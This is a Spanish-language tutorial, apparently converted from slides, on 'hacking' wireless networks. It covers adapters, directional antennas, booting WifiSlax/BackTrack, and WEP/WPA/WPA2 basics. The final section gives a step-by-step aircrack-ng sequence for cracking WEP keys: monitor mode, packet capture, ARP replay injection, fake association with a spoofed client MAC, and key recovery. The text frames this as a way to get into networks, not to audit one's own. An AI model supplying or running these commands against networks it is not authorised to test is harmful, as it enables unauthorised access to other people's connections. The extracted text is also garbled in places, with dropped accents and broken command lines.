HACKING DE REDES INALAMBRICAS

Herramientas para hacer un anlisis en redes inalmbricas :

1- EL HARDWARE: Es la parte fsica de una computadora, todo

lo que podemos tocar, palpar es decir tangible, como por
ejemplo: el monitor, el teclado, unidad de disco duro
,lectora ,etc.

2- EL SOFTWARE: Es la parte lgica de una computadora, todo

lo que no podemos tocar, palpar es decir intangible ,como por
ejemplo: un Sistema Operativo llmese Windows, Linux o una
aplicacin como Word, Excel, etc.
Softwar
e
Bueno las herramientas que necesitamos son:

* 1 tarjeta inalmbrica o adaptador USB inalmbrico.

(HARDWARE)

* 1 Antena panel de 14 dBis o 18 dBis

(HARDWARE)

* 1 Sistema Operativo Linux (WIFISLAX o BACK TRACK)

(SOFTWARE)
 ADAPTADORES INALAMBRICOS
Un adaptador inalmbrico nos permite conectar nuestro ordenador de
sobremesa o porttil a una red inalmbrica y acceder a ella.

TIPOS DE ADAPTADORES INALAMBRICOS:

TIPO TARJETA PCI O PCI

EXPRESS
TIPO USB
INALAMBRICO
Nota 1: Las tarjeta inalmbricas van dentro de la computadora en las ranuras
tipo PCI o PCI EXPRESS. OJO.Fjate muy bien que tipo de ranura tiene tu
COMPUTADORA.

Nota 2: Las tarjeta inalmbricas o USB inalmbricos traen un driver (CD de

instalacin o configuracin) lo tendrn que instalar despus de haber puesto la
tarjeta o USB inalmbrico.
 ANTENAS INALAMBRICAS
Las antenas inalmbricas son las que recepcionan la
seal.
Tipos de antenas inalmbricas:

1-LAS OMNIDIRECCIONALES:
Son antenas que irradian ondas electromagnticas en todas direcciones ,tienen
menor alcance. Este tipo de antenas lo utilizan mayormente los revendedores de
internet. Angulo de radiacin 360 grados.
2- LAS SECTORIALES:
Son las antenas que irradian seal en una zona determinada, tienen un
alcance medio. Este tipo de antenas al igual que las omnidireccionales
mayormente las utilizan los revendedores de internet. Angulo de
Radiacin entre 90 a 120 grados.
3-LAS DIRECCIONALES:
Son antenas que irradian seal en una sola direccin y debido a
esto son las que mas alcance tienen, toma en cuenta que este
tipo de antenas son las que utilizan los clientes para conectarse
a una red inalmbrica. Angulo de Radiacin de menos de 70
grados.

Angulo de radiacin 15
grados

TIPO GRILLA
TIPO PANEL
CONFIGURACION DEL ARRANQUE DEL SISTEMA
LINUX
(BACK TRACK O WIFISLAX)
1-Bootear desde la unidad CD/DVD-Rom con el DVD de WifIslax

Reinicia tu computadora y presiona varias veces la tecla SUPR si no te

funciona esta tecla, presiona alguna de estas: En algunos casos
ingresamos con F1,F2,F8,ESC,SUPR,F12 dependiendo de
diferentes fabricantes de BIOS .

Unos ejemplos de 3 tipos de BIOS:

EN ESTE CASO F12 BIOS MARCA DELL

EN ESTE CASO F2 BIOS MARCA INTEL
EN ESTE CASO SUPR, F1 O ESC PLACA MADRE PCCHIP
 SEGURIDAD EN REDES INALAMBRICAS
Posiblemente tendrn conocimiento que existen tcnicas de cifrado muy
diferentes que se utilizan para proteger las redes 802.11: la privacidad
equivalente al cableado (WEP, Wired Equivalency Protocol), Acceso Wi-Fi
protegido (WPA, Wi-Fi Protected Access) y el Acceso Protegido Wi-Fi 2
(WPA2, Wi-Fi Protected Access 2).
TIPOS DE CIFRADOS:
WEP (Privacidad Equivalente a Cableado): es el sistema de
cifrado incluido en el estndar IEEE 802.11 como protocolo para redes
Wireless que permite cifrar la informacin que se transmite.
Proporciona un cifrado a nivel 2, basado en el algoritmo de cifrado RC4
que utiliza claves de 64 bits (40 bits ms 24 bits del vector de
iniciacin IV) o de 128 bits (104 bits ms 24 bits del IV). Los mensajes
de difusin de las redes inalmbricas se transmiten por ondas de
radio, lo que los hace ms susceptibles,frente a las redes cableadas,
de ser captados con relativa facilidad. Presentado en 1999, el sistema
WEP fue pensado para proporcionar una confidencialidad comparable
a la de una red tradicional cableada.
WPA (Acceso Wi-Fi protegido):
es un sistema para proteger las redes inalmbricas (Wi-Fi); creado para
corregir las deficiencias del sistema previo, Wired Equivalent Privacy
(WEP).
1 Los investigadores han encontrado varias debilidades en el algoritmo
WEP (tales como la reutilizacin del vector de inicializacin (IV), del cual
se derivan ataques estadsticos que permiten recuperar la clave
WEP, entre otros). WPA implementa la mayora del estndar IEEE
802.11i, y fue creado como una medida intermedia para ocupar el lugar
de WEP mientras 802.11i era finalizado. WPA fue creado por The Wi-Fi
Alliance (La alianza Wi-Fi).
WPA2 (Wi-Fi Protected Access 2- Acceso Protegido Wi-Fi 2):
es un sistema para proteger las redes inalmbricas (Wi-Fi); creado para
corregir las vulnerabilidadesdetectadas en WPA .WPA2 est basada en el
nuevo estndar 802.11i. WPA, por ser una versin previa, que se podra
considerar de "migracin", no incluye todas las caractersticas del IEEE
802.11i, mientras que WPA2 se puede inferir que es la versin certificada
del estndar 802.11i.
 MEDIDAS DE SEGURIDAD
REDES OCULTAS:
Las redes ocultas no se muestran en la lista de redes que se muestran al pulsar en la
configuracin de la Red (o la lista de redes inalmbricas en cualquier otro equipo).
FILTRADO DE MAC:
El filtrado MAC se utiliza para restringir el acceso de ciertos dispositivos a tu red,
en lo que supone una medida ms de seguridad para tu router.
 DHCP DESHABILITADO
DEFINICION DE DHCP:
Protocolo de configuracin dinmica de Host (DHCP) es un protocolo
cliente-servidor que proporciona automticamente un host de protocolo
Internet (IP) con su direccin IP y otra informacin de configuracin
relacionados como, por ejemplo, la puerta de enlace predeterminada y la
mscara de subred.
 COMANDOS PARA HACKEAR REDES CON CIFRADO WEP

* iwconfig
* airmong-ng start wlan0
* airodump-ng wlan0
NOMBRE DEL ARCHIVO QUE
* airodump-ng -c CANAL DEL PUNTO
DE ACCESO
--bssid MAC DEL PUNTO
DE ACCESO
-w GUARDARA LOS PAQUETES
CAPTURADOS wlan0

MAC DEL PUNTO MAC DEL

* aireplay-ng -3 -b DE ACCESO -h CLIENTE -x 700 wlan0

MAC DEL PUNTO MAC DEL

* aireplay-ng -1 30 -e NOMBRE DE RED -b DE ACCESO -h CLIENTE wlan0

* aircrack-ng Archivo con paquetes capturados

 DEFINICION DE LOS COMANDOS

Ver que interfaces de red tenemos instaladas en nuestra computadora:

1- iwconfig

Actitvar el modo monitor:

2- airmon-ng start wlan0

Escaneo de redes:

3- airodump-ng wlan0

Captura de paquetes:

4- airodump-ng c (CANAL) -bssid (MAC DEL PUNTO DE ACCESO) w (ARCHIVO DE CAPTURA)

wlan0

Captura de paquetes mas rpido:

5- aireplay-ng -3 b (MAC DEL P.A) h (MAC DEL CLIENTE) x 900 wlan0

Asociaciones falsas:

6- aireplay-ng -1 30 e (NOMBRE DE RED) b (MAC DEL P.A) h (MAC FALSA DEL CLIENTE) wlan0

CRACKEO DE LA CLAVE DE RED INALAMBRICA:

7- aircrack-ng (ARCHIVO DE CAPTURA .cap)